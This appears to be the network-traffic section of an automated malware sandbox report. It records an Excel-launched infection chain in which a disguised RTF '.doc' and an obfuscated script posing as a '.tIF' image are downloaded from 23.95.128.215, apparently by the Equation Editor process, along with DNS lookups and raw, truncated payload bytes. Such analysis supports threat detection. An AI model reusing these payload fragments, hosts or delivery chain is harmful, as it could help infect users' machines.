                                                                      Nov 27, 2024 17:56:26.174407005 CET4917480192.168.2.2223.95.128.215
                                                                      Nov 27, 2024 17:56:26.174443007 CET4917480192.168.2.2223.95.128.215
                                                                      Nov 27, 2024 17:56:26.179027081 CET804917423.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:26.179079056 CET4917480192.168.2.2223.95.128.215
                                                                      Nov 27, 2024 17:56:26.179155111 CET804917423.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:26.179199934 CET4917480192.168.2.2223.95.128.215
                                                                      Nov 27, 2024 17:56:26.183653116 CET804917423.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:26.183711052 CET4917480192.168.2.2223.95.128.215
                                                                      Nov 27, 2024 17:56:26.183741093 CET804917423.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:26.183787107 CET4917480192.168.2.2223.95.128.215
                                                                      Nov 27, 2024 17:56:26.188478947 CET804917423.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:26.188541889 CET4917480192.168.2.2223.95.128.215
                                                                      Nov 27, 2024 17:56:26.188941002 CET804917423.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:26.188988924 CET4917480192.168.2.2223.95.128.215
                                                                      Nov 27, 2024 17:56:26.193223953 CET804917423.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:26.193275928 CET4917480192.168.2.2223.95.128.215
                                                                      Nov 27, 2024 17:56:26.193371058 CET804917423.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:26.193424940 CET4917480192.168.2.2223.95.128.215
                                                                      Nov 27, 2024 17:56:26.197993040 CET804917423.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:26.198050022 CET4917480192.168.2.2223.95.128.215
                                                                      Nov 27, 2024 17:56:26.198096991 CET804917423.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:26.198141098 CET4917480192.168.2.2223.95.128.215
                                                                      Nov 27, 2024 17:56:26.202791929 CET804917423.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:26.202851057 CET4917480192.168.2.2223.95.128.215
                                                                      Nov 27, 2024 17:56:26.202883959 CET804917423.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:26.202927113 CET4917480192.168.2.2223.95.128.215
                                                                      Nov 27, 2024 17:56:26.207560062 CET804917423.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:26.207622051 CET4917480192.168.2.2223.95.128.215
                                                                      Nov 27, 2024 17:56:26.207649946 CET804917423.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:26.207701921 CET4917480192.168.2.2223.95.128.215
                                                                      Nov 27, 2024 17:56:26.212508917 CET804917423.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:26.212523937 CET804917423.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:26.212568045 CET4917480192.168.2.2223.95.128.215
                                                                      Nov 27, 2024 17:56:26.216767073 CET804917423.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:26.216813087 CET804917423.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:26.216818094 CET4917480192.168.2.2223.95.128.215
                                                                      Nov 27, 2024 17:56:26.216854095 CET4917480192.168.2.2223.95.128.215
                                                                      Nov 27, 2024 17:56:26.221184969 CET804917423.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:26.221242905 CET4917480192.168.2.2223.95.128.215
                                                                      Nov 27, 2024 17:56:26.221304893 CET804917423.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:26.221355915 CET4917480192.168.2.2223.95.128.215
                                                                      Nov 27, 2024 17:56:26.225406885 CET804917423.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:26.225467920 CET4917480192.168.2.2223.95.128.215
                                                                      Nov 27, 2024 17:56:26.225539923 CET804917423.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:26.225586891 CET4917480192.168.2.2223.95.128.215
                                                                      Nov 27, 2024 17:56:26.229593039 CET804917423.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:26.229654074 CET4917480192.168.2.2223.95.128.215
                                                                      Nov 27, 2024 17:56:26.229800940 CET804917423.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:26.229862928 CET4917480192.168.2.2223.95.128.215
                                                                      Nov 27, 2024 17:56:27.185467958 CET4917480192.168.2.2223.95.128.215
                                                                      Nov 27, 2024 17:56:27.499610901 CET804917323.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:27.499702930 CET4917380192.168.2.2223.95.128.215
                                                                      Nov 27, 2024 17:56:30.478987932 CET49175443192.168.2.22193.30.119.205
                                                                      Nov 27, 2024 17:56:30.479046106 CET44349175193.30.119.205192.168.2.22
                                                                      Nov 27, 2024 17:56:30.479110956 CET49175443192.168.2.22193.30.119.205
                                                                      Nov 27, 2024 17:56:30.483264923 CET49175443192.168.2.22193.30.119.205
                                                                      Nov 27, 2024 17:56:30.483280897 CET44349175193.30.119.205192.168.2.22
                                                                      Nov 27, 2024 17:56:32.262799978 CET44349175193.30.119.205192.168.2.22
                                                                      Nov 27, 2024 17:56:32.262890100 CET49175443192.168.2.22193.30.119.205
                                                                      Nov 27, 2024 17:56:32.277034998 CET49175443192.168.2.22193.30.119.205
                                                                      Nov 27, 2024 17:56:32.277066946 CET44349175193.30.119.205192.168.2.22
                                                                      Nov 27, 2024 17:56:32.277410030 CET44349175193.30.119.205192.168.2.22
                                                                      Nov 27, 2024 17:56:32.376684904 CET49175443192.168.2.22193.30.119.205
                                                                      Nov 27, 2024 17:56:32.423338890 CET44349175193.30.119.205192.168.2.22
                                                                      Nov 27, 2024 17:56:32.777937889 CET44349175193.30.119.205192.168.2.22
                                                                      Nov 27, 2024 17:56:32.778614998 CET44349175193.30.119.205192.168.2.22
                                                                      Nov 27, 2024 17:56:32.778774023 CET49175443192.168.2.22193.30.119.205
                                                                      Nov 27, 2024 17:56:32.783600092 CET49175443192.168.2.22193.30.119.205
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 27, 2024 17:55:57.173398972 CET | 54562 | 53 | 192.168.2.22 | 8.8.8.8
Nov 27, 2024 17:55:57.434621096 CET | 53 | 54562 | 8.8.8.8 | 192.168.2.22
Nov 27, 2024 17:56:02.174067020 CET | 52917 | 53 | 192.168.2.22 | 8.8.8.8
Nov 27, 2024 17:56:02.423719883 CET | 53 | 52917 | 8.8.8.8 | 192.168.2.22
Nov 27, 2024 17:56:04.899614096 CET | 62751 | 53 | 192.168.2.22 | 8.8.8.8
Nov 27, 2024 17:56:05.033914089 CET | 53 | 62751 | 8.8.8.8 | 192.168.2.22
Nov 27, 2024 17:56:05.036307096 CET | 57893 | 53 | 192.168.2.22 | 8.8.8.8
Nov 27, 2024 17:56:05.284099102 CET | 53 | 57893 | 8.8.8.8 | 192.168.2.22
Nov 27, 2024 17:56:10.802742958 CET | 54821 | 53 | 192.168.2.22 | 8.8.8.8
Nov 27, 2024 17:56:11.059844017 CET | 53 | 54821 | 8.8.8.8 | 192.168.2.22
Nov 27, 2024 17:56:11.061187029 CET | 54719 | 53 | 192.168.2.22 | 8.8.8.8
Nov 27, 2024 17:56:11.319096088 CET | 53 | 54719 | 8.8.8.8 | 192.168.2.22
Nov 27, 2024 17:56:13.866019011 CET | 49881 | 53 | 192.168.2.22 | 8.8.8.8
Nov 27, 2024 17:56:14.001075029 CET | 53 | 49881 | 8.8.8.8 | 192.168.2.22
Nov 27, 2024 17:56:14.006047010 CET | 54998 | 53 | 192.168.2.22 | 8.8.8.8
Nov 27, 2024 17:56:14.140970945 CET | 53 | 54998 | 8.8.8.8 | 192.168.2.22
Nov 27, 2024 17:56:30.196841955 CET | 52781 | 53 | 192.168.2.22 | 8.8.8.8
Nov 27, 2024 17:56:30.332910061 CET | 53 | 52781 | 8.8.8.8 | 192.168.2.22
Nov 27, 2024 17:56:30.337702036 CET | 63926 | 53 | 192.168.2.22 | 8.8.8.8
Nov 27, 2024 17:56:30.475198030 CET | 53 | 63926 | 8.8.8.8 | 192.168.2.22
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 27, 2024 17:55:57.173398972 CET | 192.168.2.22 | 8.8.8.8 | 0x38d0 | Standard query (0) | ljg.cl | A (IP address) | IN (0x0001) | false
Nov 27, 2024 17:56:02.174067020 CET | 192.168.2.22 | 8.8.8.8 | 0xb285 | Standard query (0) | ljg.cl | A (IP address) | IN (0x0001) | false
Nov 27, 2024 17:56:04.899614096 CET | 192.168.2.22 | 8.8.8.8 | 0x5ca9 | Standard query (0) | ljg.cl | A (IP address) | IN (0x0001) | false
Nov 27, 2024 17:56:05.036307096 CET | 192.168.2.22 | 8.8.8.8 | 0xe84 | Standard query (0) | ljg.cl | A (IP address) | IN (0x0001) | false
Nov 27, 2024 17:56:10.802742958 CET | 192.168.2.22 | 8.8.8.8 | 0x1100 | Standard query (0) | ljg.cl | A (IP address) | IN (0x0001) | false
Nov 27, 2024 17:56:11.061187029 CET | 192.168.2.22 | 8.8.8.8 | 0x2664 | Standard query (0) | ljg.cl | A (IP address) | IN (0x0001) | false
Nov 27, 2024 17:56:13.866019011 CET | 192.168.2.22 | 8.8.8.8 | 0xd97e | Standard query (0) | ljg.cl | A (IP address) | IN (0x0001) | false
Nov 27, 2024 17:56:14.006047010 CET | 192.168.2.22 | 8.8.8.8 | 0x9c5b | Standard query (0) | ljg.cl | A (IP address) | IN (0x0001) | false
Nov 27, 2024 17:56:30.196841955 CET | 192.168.2.22 | 8.8.8.8 | 0xcf24 | Standard query (0) | 3105.filemail.com | A (IP address) | IN (0x0001) | false
Nov 27, 2024 17:56:30.337702036 CET | 192.168.2.22 | 8.8.8.8 | 0xe660 | Standard query (0) | 3105.filemail.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 27, 2024 17:55:57.434621096 CET | 8.8.8.8 | 192.168.2.22 | 0x38d0 | No error (0) | ljg.cl |  | 152.231.102.107 | A (IP address) | IN (0x0001) | false
Nov 27, 2024 17:56:02.423719883 CET | 8.8.8.8 | 192.168.2.22 | 0xb285 | No error (0) | ljg.cl |  | 152.231.102.107 | A (IP address) | IN (0x0001) | false
Nov 27, 2024 17:56:05.033914089 CET | 8.8.8.8 | 192.168.2.22 | 0x5ca9 | No error (0) | ljg.cl |  | 152.231.102.107 | A (IP address) | IN (0x0001) | false
Nov 27, 2024 17:56:05.284099102 CET | 8.8.8.8 | 192.168.2.22 | 0xe84 | No error (0) | ljg.cl |  | 152.231.102.107 | A (IP address) | IN (0x0001) | false
Nov 27, 2024 17:56:11.059844017 CET | 8.8.8.8 | 192.168.2.22 | 0x1100 | No error (0) | ljg.cl |  | 152.231.102.107 | A (IP address) | IN (0x0001) | false
Nov 27, 2024 17:56:11.319096088 CET | 8.8.8.8 | 192.168.2.22 | 0x2664 | No error (0) | ljg.cl |  | 152.231.102.107 | A (IP address) | IN (0x0001) | false
Nov 27, 2024 17:56:14.001075029 CET | 8.8.8.8 | 192.168.2.22 | 0xd97e | No error (0) | ljg.cl |  | 152.231.102.107 | A (IP address) | IN (0x0001) | false
Nov 27, 2024 17:56:14.140970945 CET | 8.8.8.8 | 192.168.2.22 | 0x9c5b | No error (0) | ljg.cl |  | 152.231.102.107 | A (IP address) | IN (0x0001) | false
Nov 27, 2024 17:56:30.332910061 CET | 8.8.8.8 | 192.168.2.22 | 0xcf24 | No error (0) | 3105.filemail.com | ip.3105.filemail.com |  | CNAME (Canonical name) | IN (0x0001) | false
Nov 27, 2024 17:56:30.332910061 CET | 8.8.8.8 | 192.168.2.22 | 0xcf24 | No error (0) | ip.3105.filemail.com |  | 193.30.119.205 | A (IP address) | IN (0x0001) | false
Nov 27, 2024 17:56:30.475198030 CET | 8.8.8.8 | 192.168.2.22 | 0xe660 | No error (0) | 3105.filemail.com | ip.3105.filemail.com |  | CNAME (Canonical name) | IN (0x0001) | false
Nov 27, 2024 17:56:30.475198030 CET | 8.8.8.8 | 192.168.2.22 | 0xe660 | No error (0) | ip.3105.filemail.com |  | 193.30.119.205 | A (IP address) | IN (0x0001) | false
• ljg.cl
• 3105.filemail.com
• 23.95.128.215
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.22 | 49166 | 23.95.128.215 | 80 | 3208 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Timestamp | Bytes transferred | Direction | Data
Nov 27, 2024 17:55:59.925378084 CET | 512 | OUT | GET /43/hu/seemybestmagicalthingseniterworldwhcihgivenbesthingsenterietimegiven_____________givembestthingswhichireallyfelltodobestthingswhichireallynedd__________bestofluckthignsaregoodnadsage.doc HTTP/1.1
    Accept: */*
    UA-CPU: AMD64
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
    Host: 23.95.128.215
    Connection: Keep-Alive
Nov 27, 2024 17:56:01.144768000 CET | 1236 | IN | HTTP/1.1 200 OK
    Date: Wed, 27 Nov 2024 16:56:00 GMT
    Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25
    Last-Modified: Tue, 26 Nov 2024 16:17:10 GMT
    ETag: "3d07c-627d32e6398c8"
    Accept-Ranges: bytes
    Content-Length: 249980
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Content-Type: application/msword
    Data Raw: 7b 5c 72 74 66 31 0d 09 09 7b 5c 2a 5c 70 6e 61 69 75 64 36 30 33 39 38 30 38 33 34 20 5c 2e 7d 0d 7b 5c 34 39 37 39 31 30 31 39 37 30 28 b5 2a 32 25 3e 5e 35 35 2d 2f 5f 3f 37 2e 21 2b 25 3e 34 3b 32 b5 25 33 3b 2f 31 3f 40 7c 39 3b a7 37 3f 3b 5e 31 5b 3c 5b 3d 30 5e 25 2b 2a 3f 28 5f 3f 26 7c 33 31 23 2a 35 5f 37 3f 60 b0 40 3f 29 21 37 24 60 38 30 3f 25 3d 30 a7 37 34 28 2e 3f 27 29 25 30 b0 3f 2d 2f 27 3f 39 2c 23 33 2a 2d 25 29 2b 3a 37 25 7c 30 2e 5d 30 2d 3f 5b 3f 2c 3d 29 3f 2d 3e 3a 38 2f 29 5f 3c 35 60 28 40 2d 5e 3a 23 39 24 3f 3f 35 32 30 2a 5d 2b 2f 3f 38 7e 37 28 b5 25 35 37 40 2d 37 60 30 26 36 5e 21 3b 3c 60 23 38 3b 3f 2a 31 2f 24 33 b5 23 28 5e 37 3b 5f 3a 2f 40 3d 3f 3f 3f 32 2c 29 25 26 3e 2e 3a 5e 25 b5 2d b0 b0 21 25 2a 2f 32 3d 36 21 2a 34 2f 29 3b 3e 3e 29 25 2b 5e 3a 3f 5e 34 5d b5 5f 32 3e 38 40 28 37 38 24 25 3f 28 3a 38 30 3f 2b 38 3f 3a 32 7e 5d 3a 25 34 3c 40 35 39 60 2a 2e 2f 3d 5d 31 25 3a 2c 39 35 35 3f 26 37 32 3f 26 3f 2f 5d 23 34 37 3c 25 40 3f 31 3d 7e 5f b0 3f [TRUNCATED]
    Data Ascii: {\rtf1{\*\pnaiud603980834 \.}{\4979101970(*2%>^55-/_?7.!+%>4;2%3;/1?@|9;7?;^1[<[=0^%+*?(_?&|31#*5_7?`@?)!7$`80?%=074(.?')%0?-/'?9,#3*-%)+:7%|0.]0-?[?,=)?->:8/)_<5`(@-^:#9$??520*]+/?8~7(%57@-7`0&6^!;<`#8;?*1/$3#(^7;_:/@=???2,)%&>.:^%-!%*/2=6!*4/);>>)%+^:?^4]_2>8@(78$%?(:80?+8?:2~]:%4<@59`*./=]1%:,955?&72?&?/]#47<%@?1=~_?%:+:&49~#5!+@_??/!?<,$`8?)?[`(?|5/??4>=+8,%^[`-.`*?&^7|>*-`^9'?791?^`?'|2~6+:,)4??(<51-7^23|+0:7^&;`0(#&?^@'=1^?@?!%<>554*:~@+1;4$%:;,;_?0*%-+|[=%-?&&$?>=_]0>9,?,.(=@3??$;`9?[>?7,8&=5)]`=8_$~059|3.%&+#3:&;01??%#9<2#<4?8?=:/%%$4%/`(,5:;`-????~]03=?%180>(~8|?8'#??~,@;?~??`)!,`3]_!#3'`)%!~<?(3@^>7?&(*18*%0![0%?(<*?:.734_8@]$<@6;?1%0-@.<.!2|>?~?'08<5%.-241'&$$&6!'+)74-@;4%%`/-!.;%=0>=^$08?$(;4;%=0|'./3*!2??:7'#4??%6`)6&|7?._?5$;;[.;[$_#+(.49;?#<.+`>5+$?%.1%*??4@3<'(@248.??!$5??9@?'5-??@^<8('],[`@8?72*?1;;&`/:?*;)_44~~>-)[~9|6^7>[?%1783^+<)_
Nov 27, 2024 17:56:01.144795895 CET | 1236 | IN | Data Raw: 3f 24 3f 2f 2c 3d 5e 5b 5b 25 3f 7c 26 34 23 7c 2d 23 5e b5 31 3f 35 25 33 26 25 3f 28 3f 5e 3b 3a 3f 2d 31 23 3f 31 b0 24 2b 36 5d 25 23 30 3f b0 2c 36 3f 60 b5 28 24 38 32 2a b0 3f 5d 23 33 21 a7 5b 26 38 39 2c 34 60 3a 3a 40 39 3a 5d 5f 31 21
    Data Ascii: ?$?/,=^[[%?|&4#|-#^1?5%3&%?(?^;:?-1#?1$+6]%#0?,6?`($82*?]#3![&89,4`::@9:]_1!.%'_%%!&!$50%487>/=.^[|4#?(.77:;1&@,5*(=?:*'8_13/|~5<)?_59?5)/34^/)=_+??%*002;?==8;?1'2(7~.?,`9=;_-#,:5(??^0~6`8#?=<%#/[7`3%&/:[]2,++)%[.>?[-'4*?0?@6%?
Nov 27, 2024 17:56:01.144807100 CET | 1236 | IN | Data Raw: 2d 37 27 29 26 2b 7e 2d 21 2d b5 26 60 3e 3f 3c 7c 5f 34 23 30 3f 40 3f 3f 3f b5 3f 5b 3a 3f 2a 2a b0 7e 3f 39 39 3f 28 38 b0 3f 30 3c 25 7c 3f 27 30 60 28 35 34 3c 3f 5e b0 2f 2d 27 5f 2a 7c 3f 3f 3a 31 60 38 27 5b 7e 33 b5 3e 5f 3c 27 25 23 5f
    Data Ascii: -7')&+~-!-&`>?<|_4#0?@????[:?**~?99?(8?0<%|?'0`(54<?^/-'_*|??:1`8'[~3>_<'%#_=/=%0++58$#+*8?0??34/6#*/^=^@=~,_3#^?!_3!;-#1*&@=(_!-6*2^<#?|%]3,_?&5'?[?;3!]@&7949??](2'8&8%6,?1=?3??<?[7*87>51%%&3<_5?'%`?%>*,,)_&;3#:_@?8)_>?!+'?;!~.#(+
Nov 27, 2024 17:56:01.144953012 CET | 672 | IN | Data Raw: 2e 40 28 b0 3d 7e 60 30 29 3d 27 28 3b 25 25 37 40 31 3f 7e 2b 25 7c b0 b5 24 3f 7e 30 3f 21 30 7c 2b 40 28 3f 3d 2a 2c 28 23 33 23 33 34 34 30 37 7e 3e 25 31 2d 34 a7 5b 33 35 30 a7 24 2a a7 28 38 3c 5f 28 3a 2b 3b 60 60 38 2c 26 3f 2e 34 a7 40
    Data Ascii: .@(=~`0)='(;%%7@1?~+%|$?~0?!0|+@(?=*,(#3#34407~>%1-4[350$*(8<_(:+;``8,&?.4@[0!9'];?||4'31;++136$!%?^;&.?`((!?-`81=%%+?38?-=1>]^]5=0@?8?/#4/'$?[|/1(1?&*9?:%??~<(~`~<$32#7?|>87`?:0'+|6[|_/^7&4[3`+&'6)!@|?(1/40~_?2?2!2.|'*6^]]*5
Nov 27, 2024 17:56:01.144968033 CET | 1236 | IN | Data Raw: b5 2a 2d 3e a7 2c 37 33 34 60 7e 3b 37 26 b5 37 5b a7 28 28 25 b5 21 3f 7e 3f a7 40 2c 3a 38 37 5b 21 27 40 3b a7 38 40 2b 5b 28 28 2b 3b 38 23 2c 37 2a 7c 39 2c 39 26 2e 25 2a 3f 25 27 3f 32 35 3f 2a b5 23 3f 3f 3b 34 5e 3a 3e 29 7c 5b 3f 3b 2e
    Data Ascii: *->,734`~;7&7[((%!?~?@,:87[!'@;8@+[((+;8#,7*|9,9&.%*?%'?25?*#??;4^:>)|[?;.)^]89;7:'~*7%?;=8^:4(5`%~@4`-0@_???=2^,/:,|;+)!@(,?&;6/.)4+83^;?`67!(%$#499,.^3^^^%]@`->430`30]895:++,51+<:?3928,:$2*3~%#4|>$7|_?>=9)?%?/)2|52|,4,<?>5%<;>
Nov 27, 2024 17:56:01.144984007 CET | 1236 | IN | Data Raw: 5c 6c 65 76 65 6c 74 65 78 74 35 34 30 34 38 32 38 31 34 20 5c 62 69 6e 30 30 30 30 30 5c 39 32 30 32 34 35 31 36 35 34 31 34 33 30 34 39 30 37 7d 0d 5c 72 65 76 62 61 72 37 34 33 35 37 33 35 39 33 32 39 37 33 5c 66 62 69 61 73 35 39 35 38 36 33
    Data Ascii: \leveltext540482814 \bin00000\920245165414304907}\revbar7435735932973\fbias59586377\'
Nov 27, 2024 17:56:01.144995928 CET | 1236 | IN | Data Raw: 20 09 20 39 37 0a 0a 0d 0d 0d 0a 0d 0d 0a 0d 0d 0d 0a 0d 0a 0a 0d 0d 0d 0d 0a 0d 0d 0d 0d 0a 0d 0a 0d 0a 0d 0d 0a 0d 0d 0a 34 0a 0a 0d 0d 0d 0a 0d 0a 0d 0a 0a 0d 0d 0a 0d 0d 0a 0a 0d 0a 0a 0a 0d 0a 0a 0d 0a 0a 0d 0a 0d 0d 0a 0d 0d 0a 34 09 20 20
    Data Ascii: 9744 754
Nov 27, 2024 17:56:01.145009041 CET | 1236 | IN | Data Raw: 20 09 09 20 09 20 09 20 09 20 30 09 09 20 09 20 09 20 09 09 20 09 20 20 20 09 09 09 09 20 09 09 09 09 20 09 20 09 09 09 09 20 09 20 09 20 09 09 09 09 20 09 09 09 20 20 09 20 09 20 20 20 20 09 20 09 20 09 09 20 20 20 20 20 09 20 09 09 20 09 09 20
    Data Ascii: 0 00 00000
Nov 27, 2024 17:56:01.145240068 CET | 1236 | IN | Data Raw: 20 09 20 09 20 61 65 0a 0d 0d 0d 0d 0d 0a 0a 0d 0a 0d 0d 0d 0a 0d 0a 0a 0a 0a 0d 0d 0a 0d 0a 0d 0a 0d 0d 0a 0d 0d 0d 0a 0a 0d 0a 31 30 30 30 30 30 30 30 0a 0d 0d 0d 0d 0d 0a 0a 0d 0a 0d 0d 0d 0a 0d 0a 0a 0a 0a 0d 0d 0a 0d 0a 0d 0a 0d 0d 0a 0d 0d
    Data Ascii: ae100000000000000
Nov 27, 2024 17:56:01.145252943 CET | 1236 | IN | Data Raw: 09 20 20 20 09 09 09 09 20 09 20 20 09 20 20 20 20 20 20 20 20 20 09 20 09 09 09 20 09 20 09 09 09 20 20 09 20 20 20 20 09 09 09 09 20 09 20 20 20 20 09 09 09 09 20 20 09 20 09 09 20 09 20 36 09 09 20 20 20 20 20 09 20 09 20 20 09 20 09 09 20 20
    Data Ascii: 6 00 0
Nov 27, 2024 17:56:01.265113115 CET | 1236 | IN | Data Raw: 20 20 20 09 09 09 20 20 09 20 09 20 20 20 20 20 20 20 20 09 09 09 20 09 09 09 09 20 20 09 20 09 09 20 09 20 30 0d 0a 0d 0d 0d 0a 0a 0d 0d 0a 0d 0d 0d 0d 0d 0d 0d 0d 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0d 0a 0d 0a 0a 0d 0a 30 0d 0a 0a 0a 0a 0a 0a 0d
    Data Ascii: 0010 000


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.22 | 49173 | 23.95.128.215 | 80 | 3472 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Timestamp | Bytes transferred | Direction | Data
Nov 27, 2024 17:56:21.332226992 CET | 325 | OUT | HEAD /43/hu/seemybestmagicalthingseniterworldwhcihgivenbesthingsenterietimegiven_____________givembestthingswhichireallyfelltodobestthingswhichireallynedd__________bestofluckthignsaregoodnadsage.doc HTTP/1.1
    User-Agent: Microsoft Office Existence Discovery
    Host: 23.95.128.215
    Content-Length: 0
    Connection: Keep-Alive
Nov 27, 2024 17:56:22.510947943 CET | 323 | IN | HTTP/1.1 200 OK
    Date: Wed, 27 Nov 2024 16:56:22 GMT
    Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25
    Last-Modified: Tue, 26 Nov 2024 16:17:10 GMT
    ETag: "3d07c-627d32e6398c8"
    Accept-Ranges: bytes
    Content-Length: 249980
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Content-Type: application/msword


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.22 | 49174 | 23.95.128.215 | 80 | 3812 | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Timestamp | Bytes transferred | Direction | Data
Nov 27, 2024 17:56:24.232726097 CET | 362 | OUT | GET /43/seemegivenmebesttokissyourlipswithentirethingsf9rmegive.tIF HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
    Host: 23.95.128.215
    Connection: Keep-Alive
Nov 27, 2024 17:56:25.439997911 CET | 1236 | IN | HTTP/1.1 200 OK
    Date: Wed, 27 Nov 2024 16:56:25 GMT
    Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25
    Last-Modified: Tue, 26 Nov 2024 16:28:30 GMT
    ETag: "28446-627d356f81e23"
    Accept-Ranges: bytes
    Content-Length: 164934
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Content-Type: image/tiff
    Data Raw: ff fe 0d 00 0a 00 0d 00 0a 00 57 00 4c 00 4c 00 50 00 51 00 42 00 4b 00 5a 00 52 00 66 00 55 00 57 00 4c 00 52 00 6b 00 20 00 3d 00 20 00 22 00 4f 00 4a 00 65 00 7a 00 75 00 57 00 7a 00 78 00 4c 00 69 00 7a 00 62 00 68 00 4e 00 61 00 22 00 0d 00 0a 00 57 00 72 00 4c 00 57 00 47 00 65 00 4b 00 63 00 71 00 66 00 6c 00 75 00 4b 00 74 00 78 00 20 00 3d 00 20 00 22 00 57 00 57 00 6b 00 70 00 4b 00 70 00 41 00 4c 00 69 00 69 00 75 00 64 00 47 00 65 00 57 00 22 00 0d 00 0a 00 7a 00 4b 00 54 00 6b 00 4b 00 69 00 6c 00 68 00 4f 00 74 00 70 00 6c 00 65 00 52 00 41 00 20 00 3d 00 20 00 22 00 55 00 47 00 47 00 74 00 4b 00 73 00 4e 00 69 00 47 00 78 00 75 00 4c 00 42 00 57 00 49 00 22 00 0d 00 0a 00 69 00 68 00 65 00 6e 00 6c 00 63 00 65 00 4b 00 4c 00 4c 00 4c 00 68 00 6a 00 41 00 76 00 20 00 3d 00 20 00 22 00 73 00 57 00 4c 00 71 00 69 00 63 00 4c 00 43 00 4b 00 50 00 47 00 50 00 4e 00 69 00 6e 00 22 00 0d 00 0a 00 4c 00 70 00 63 00 4c 00 68 00 43 00 6d 00 6e 00 62 00 57 00 4b 00 50 00 4c 00 4c 00 4b 00 20 00 [TRUNCATED]
    Data Ascii: WLLPQBKZRfUWLRk = "OJezuWzxLizbhNa"WrLWGeKcqfluKtx = "WWkpKpALiiudGeW"zKTkKilhOtpleRA = "UGGtKsNiGxuLBWI"ihenlceKLLLhjAv = "sWLqicLCKPGPNin"LpcLhCmnbWKPLLK = "IKnpKfLmNufLrfB"BUpzWWNzpdWLUPL = "GLfLldNaLZGlULd"iKUOCjKoKLbepKL = "pLWWoGJixSuUGnP"zmzeOGcRchAxBmt = "fZBdcLOnnioczaG"cWWtUCaIkUifKAW = "fpkLhWZhSPKiOKb"iKsLUenmikCiAhU = "BZxkTGUTeSWiHfT"fBOiubBKctBGcUL = "PTfAiNlZhNATUgA"PbqOupazKKZAKZr = "huLlklWGSLWAZaJ"KoqNccjm
Nov 27, 2024 17:56:25.440022945 CET | 224 | IN | Data Raw: 00 6c 00 55 00 5a 00 53 00 6b 00 4b 00 42 00 20 00 3d 00 20 00 22 00 55 00 47 00 5a 00 57 00 75 00 4b 00 62 00 6f 00 6f 00 4f 00 63 00 57 00 5a 00 65 00 72 00 22 00 0d 00 0a 00 55 00 61 00 62 00 6b 00 4b 00 7a 00 63 00 4c 00 55 00 5a 00 4c 00 4f
    Data Ascii: lUZSkKB = "UGZWuKbooOcWZer"UabkKzcLUZLOBZG = "KudLAchAHcuKbWO"xtcZKNjlpKRtWcL = "gjUBoKLnlPkOUzq"GkNePiRGt
Nov 27, 2024 17:56:25.440035105 CET | 1236 | IN | Data Raw: 00 63 00 55 00 55 00 75 00 62 00 74 00 20 00 3d 00 20 00 22 00 7a 00 5a 00 69 00 78 00 57 00 78 00 4c 00 6f 00 57 00 68 00 6b 00 43 00 75 00 6c 00 6b 00 22 00 0d 00 0a 00 55 00 69 00 55 00 67 00 42 00 4c 00 6b 00 41 00 67 00 66 00 7a 00 57 00 4c
    Data Ascii: cUUubt = "zZixWxLoWhkCulk"UiUgBLkAgfzWLjO = "fsuiKKCLQWiczkf"QARJWGGLZkWzGPK = "BLSiRpOufZGvBWL"RGibfcnNWiexOol = "
